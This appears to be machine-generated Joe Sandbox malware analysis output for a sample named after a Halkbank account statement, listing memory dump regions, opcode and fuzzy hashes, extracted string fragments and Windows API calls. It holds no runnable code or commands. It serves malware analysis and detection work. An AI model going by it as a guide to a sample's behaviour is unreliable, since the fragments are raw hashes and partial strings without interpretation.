                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0456eb4150d5462b922dcf9d4a62a31c7af117962a25785849683cae62ab707f
                                                              • Instruction ID: 3ef3e8c993040104e77f4b628cdeb6cde9b23a79cc6453a726577967f29253e9
                                                              • Opcode Fuzzy Hash: 0456eb4150d5462b922dcf9d4a62a31c7af117962a25785849683cae62ab707f
                                                              • Instruction Fuzzy Hash: F84188B1D056288BEB58CF6BC944789FAF3AFC9310F14C1AAC50CA6265DB740A86CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46d93b72a9350a2960fc1617739e10f0472dccf6b84859ed1068875974855d9a
                                                              • Instruction ID: 3bfc53935f9d09c60e652f286d4cafd7d30f7ab52914c2fd9eced9e547345560
                                                              • Opcode Fuzzy Hash: 46d93b72a9350a2960fc1617739e10f0472dccf6b84859ed1068875974855d9a
                                                              • Instruction Fuzzy Hash: D6417C71D016288BEB58CF6BCD557D9FAF3AFC9300F04C0AAD50CA6254DB741A868F51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0fd80ea94c9ec7b7eca7d4567e03a8fe5a13eeeae9117dd4cfa8847eb21bddbb
                                                              • Instruction ID: a0620060cbbf1a3216248cea9c187b3da8acb6ba3dd1859d70ccd4304496f49b
                                                              • Opcode Fuzzy Hash: 0fd80ea94c9ec7b7eca7d4567e03a8fe5a13eeeae9117dd4cfa8847eb21bddbb
                                                              • Instruction Fuzzy Hash: E94158B1D016288BEB58CF6BC945799FAF3AFC9300F14C1AAC50CA6264DB740A86CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f41d4cade419e56ece73b4924248bc3debaad1e9a115d40ab934f3ee87a7dbf1
                                                              • Instruction ID: 89146c23492cdbce23bcbe888fae2566dfd50852a051ae5723d700d392e6dd9b
                                                              • Opcode Fuzzy Hash: f41d4cade419e56ece73b4924248bc3debaad1e9a115d40ab934f3ee87a7dbf1
                                                              • Instruction Fuzzy Hash: A94179B1D016289FEB58CF6BC945789FAF3AFC9304F04C1AAD50CA6264DB740A86CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1e8dca7c171860fc8d19cc92744c73346687d785f538e86b6c7b25a396d336c
                                                              • Instruction ID: 634db5a04913cdf9d92cb09bca2f16d50284c6f639c8914422184e3b4b99fde1
                                                              • Opcode Fuzzy Hash: f1e8dca7c171860fc8d19cc92744c73346687d785f538e86b6c7b25a396d336c
                                                              • Instruction Fuzzy Hash: 2F416BB1D016188FEB58CF6BC945799FAF3AFC9304F14C1AAD50CA6264DB740A86CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                              • API String ID: 0-1435242062
                                                              • Opcode ID: adfd9f23d88de79a66017bf999e5749e17557d3850998f8b1e40581b8ef0b2d6
                                                              • Instruction ID: 0cce7e0ea36da1dd7619956acf95a41180925a963d6c3940f63356046075c09b
                                                              • Opcode Fuzzy Hash: adfd9f23d88de79a66017bf999e5749e17557d3850998f8b1e40581b8ef0b2d6
                                                              • Instruction Fuzzy Hash: F5125C30A00209DFEB66CF68D884A9DBBF2BF48314F158599F9859B2A1DB35FD41CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$Xaq$Xaq$Xaq$Xaq
                                                              • API String ID: 0-3187220489
                                                              • Opcode ID: 4c7d3e66094859acd81f72234c866f52df0ac3a3a3b3f661a65190483468cf72
                                                              • Instruction ID: d6b6ca51fe7de3cb5826d7820fdcf97ae2b603cabbe5486d99b94f581d89b8b4
                                                              • Opcode Fuzzy Hash: 4c7d3e66094859acd81f72234c866f52df0ac3a3a3b3f661a65190483468cf72
                                                              • Instruction Fuzzy Hash: 7A1248B680F3C45FDB534B7488682957F70EF67208F2848EFD0C5DA1A3E6661A4AD742
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: uz$uz
                                                              • API String ID: 0-1270533253
                                                              • Opcode ID: 8ba4349d238668f76b46d29b624453a3479530f7d6fa9da9d800ff3c8436aeb0
                                                              • Instruction ID: f15a1ee1f561428f030651ebdd58e663a83309d45ed8341b2d6e3188fbc7b353
                                                              • Opcode Fuzzy Hash: 8ba4349d238668f76b46d29b624453a3479530f7d6fa9da9d800ff3c8436aeb0
                                                              • Instruction Fuzzy Hash: 30812E71D0A3899FDF12DFA4C85458DBFB1AF4A300F1982EBE444DB2A2D3799845CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 007AF862
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID: uz$uz
                                                              • API String ID: 716092398-1270533253
                                                              • Opcode ID: 5bace7b9f94ae0a8f800eb4b75195c24e912bee80de21d7b5ee8e74cb53573f0
                                                              • Instruction ID: 27321be764ebaf866786605296b8e3c109a2398950d4e13ddb28ce906a1f060f
                                                              • Opcode Fuzzy Hash: 5bace7b9f94ae0a8f800eb4b75195c24e912bee80de21d7b5ee8e74cb53573f0
                                                              • Instruction Fuzzy Hash: 5941B2B1D10309DFDB14CF9AC884ADEBBB5FF89310F24822AE419AB250D7759945CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 007AF862
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID: uz$uz
                                                              • API String ID: 716092398-1270533253
                                                              • Opcode ID: da6f9f9f57c15c1530443e66eac0e48d737859fa1e485af1c1f22336edc4631a
                                                              • Instruction ID: 1b93e2aab1bdcafb4a150c11e7fb5ca421e7d95e463766dfb4e97d26aabde257
                                                              • Opcode Fuzzy Hash: da6f9f9f57c15c1530443e66eac0e48d737859fa1e485af1c1f22336edc4631a
                                                              • Instruction Fuzzy Hash: 1B41C1B1D003499FDB14CF99C884ADEBFB5FF89310F24822AE419AB250D7759845CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 00E1418D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220783498.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_e10000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID: uz
                                                              • API String ID: 2538663250-117461317
                                                              • Opcode ID: c1c68c83e9c670ec2b10928412741838f5c767f8a0a1e873d73350f77c0c14b7
                                                              • Instruction ID: 92b2eb91cdb8d5402c7c7dffe9d4ae46bfba36f162a8b743ca82769932478834
                                                              • Opcode Fuzzy Hash: c1c68c83e9c670ec2b10928412741838f5c767f8a0a1e873d73350f77c0c14b7
                                                              • Instruction Fuzzy Hash: A2913971A003498FCB01DFA4C845ADEBBF6BF89314F25516AE409BB261DB31AE85CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 007AD3BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID: uz
                                                              • API String ID: 4139908857-117461317
                                                              • Opcode ID: 7b5340925ae316cddb04f877b7ca12c280cf207caa31e3a18c0bc1922a5e9446
                                                              • Instruction ID: 4b3200bc38732ed5b25fa7afdd3133cc1b498c6dca9c9c712b44e9bad2d4c989
                                                              • Opcode Fuzzy Hash: 7b5340925ae316cddb04f877b7ca12c280cf207caa31e3a18c0bc1922a5e9446
                                                              • Instruction Fuzzy Hash: 74816870A00B058FD724DF69D45579ABBF1FF89300F108A2EE48AD7A90D779E849CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00E11CB1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220783498.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_e10000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID: uz
                                                              • API String ID: 2714655100-117461317
                                                              • Opcode ID: 7a76c567daf0496c9a43d0b72583cb2dedd6fc4a85782ab344dc60e4c5957d7f
                                                              • Instruction ID: b90d6998f3adb7c7774964d5728e9eddd3bc0f6031dc3bcce1a12a9d0e7e862f
                                                              • Opcode Fuzzy Hash: 7a76c567daf0496c9a43d0b72583cb2dedd6fc4a85782ab344dc60e4c5957d7f
                                                              • Instruction Fuzzy Hash: 644129B5900305CFDB54CF99C448A9AFBF5FB88314F25C499D519A7321D374A981CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007A4E37
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID: uz
                                                              • API String ID: 3793708945-117461317
                                                              • Opcode ID: ac9d8987e6b55692e4537777a282e04a23d475e3737b7d21669f42b06a34993e
                                                              • Instruction ID: ac6cbab42be3d59bb04511bdb3baef4da493da81873d0bdd34926a1405db75d7
                                                              • Opcode Fuzzy Hash: ac9d8987e6b55692e4537777a282e04a23d475e3737b7d21669f42b06a34993e
                                                              • Instruction Fuzzy Hash: 3021E5B5D00249DFDB10CFA9D484ADEBFF4FB48310F14851AE918A3250C379A954CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007A4E37
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID: uz
                                                              • API String ID: 3793708945-117461317
                                                              • Opcode ID: 4871d6020fa435219458590675f6c2a6a0a8ee88ddfdb0b0bf7ebb50432c7fba
                                                              • Instruction ID: e49bb0cf290471ca25d94f1cbbc4b8b5300238aa52f7a8d35d33b35fe9ab8c7b
                                                              • Opcode Fuzzy Hash: 4871d6020fa435219458590675f6c2a6a0a8ee88ddfdb0b0bf7ebb50432c7fba
                                                              • Instruction Fuzzy Hash: FB21C4B5D002499FDB10CFAAD984ADEBBF8FB48310F14841AE918A3350D379A954CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007AD439,00000800,00000000,00000000), ref: 007AD62A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: uz
                                                              • API String ID: 1029625771-117461317
                                                              • Opcode ID: 5610d4a85ac8de6b18a098b45efcd8b9685501c6db7acfe2b7ee068c16d3e4c2
                                                              • Instruction ID: 28b9b95d92a2cbed871557bf0e4de1ab2c75c2f471a059ac92f43449ba542c75
                                                              • Opcode Fuzzy Hash: 5610d4a85ac8de6b18a098b45efcd8b9685501c6db7acfe2b7ee068c16d3e4c2
                                                              • Instruction Fuzzy Hash: B51156B6C002098FDB20CFAAD444ADEFBF4EB89310F15852ED419A7600C379A945CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007AD439,00000800,00000000,00000000), ref: 007AD62A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: uz
                                                              • API String ID: 1029625771-117461317
                                                              • Opcode ID: 0f1c9a3fc7017bb13bb981d0af50b0cf858cb234565dd4acaf7b772ae6ea6c77
                                                              • Instruction ID: 570a1fb1f88f5833220413eaadbfa72e2873477d7cea22dbae6cc2f781e76af6
                                                              • Opcode Fuzzy Hash: 0f1c9a3fc7017bb13bb981d0af50b0cf858cb234565dd4acaf7b772ae6ea6c77
                                                              • Instruction Fuzzy Hash: 8D1129B5D003099FDB20DF9AD448ADEFBF4EB89310F10856ED419A7600C379A945CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 007AD3BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220092242.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7a0000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID: uz
                                                              • API String ID: 4139908857-117461317
                                                              • Opcode ID: bd09e29fd5ecb526e1a35b8e830c274a0e1bb18c0bca03cadf38d86fb33f33e5
                                                              • Instruction ID: 9f919be338cd990cb4b762426ddf7b124068e7ce2c8629a24d3bb24852265944
                                                              • Opcode Fuzzy Hash: bd09e29fd5ecb526e1a35b8e830c274a0e1bb18c0bca03cadf38d86fb33f33e5
                                                              • Instruction Fuzzy Hash: 3A1110B5C00249CFCB20DF9AD444ADEFBF4EB88310F11852AD41AA7610C379A945CFA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 00E1418D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220783498.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_e10000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID: uz
                                                              • API String ID: 2538663250-117461317
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 00E1418D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220783498.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_e10000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID: uz
                                                              • API String ID: 2538663250-117461317
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $]q$$]q
                                                              • API String ID: 0-127220927
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q
                                                              • API String ID: 0-3120983240
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq$Haq
                                                              • API String ID: 0-4016896955
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q$LR]q
                                                              • API String ID: 0-3917262905
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq$,aq
                                                              • API String ID: 0-2990736959
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (&]q$(aq
                                                              • API String ID: 0-1602648543
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xaq$Xaq
                                                              • API String ID: 0-1488805882
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q
                                                              • API String ID: 0-3081347316
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q
                                                              • API String ID: 0-3081347316
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224906615.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6620000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224906615.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6620000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224906615.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6620000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 06628ED6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224906615.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6620000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q
                                                              • API String ID: 0-794736227
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: uz
                                                              • API String ID: 0-117461317
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 745d56cdaa38068d717a47e280325b89b627b83953c2f1d6d89e3c43d11ffcd1
                                                              • Instruction ID: 8028de7bc94bfabf56a7ec4e7552435f6035f494741cd5d7f3e340788f987e06
                                                              • Opcode Fuzzy Hash: 745d56cdaa38068d717a47e280325b89b627b83953c2f1d6d89e3c43d11ffcd1
                                                              • Instruction Fuzzy Hash: B681A174E412289FDB64DF65DC50BDDBBB2AF89300F1081EAE849A7254DB315E81CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d5ff64698bfe4833e492fa08b5ac5a706da9471a04a56a8a0a0668e79b4cc771
                                                              • Instruction ID: 6743c0cfda81405672f6a48862938b878304a804a0a6157128be175f5644f1d4
                                                              • Opcode Fuzzy Hash: d5ff64698bfe4833e492fa08b5ac5a706da9471a04a56a8a0a0668e79b4cc771
                                                              • Instruction Fuzzy Hash: B451B27002178ACF93303FA0B5AC52A7BB5FB0F7277606C01E19E90458DBBA5884EB52
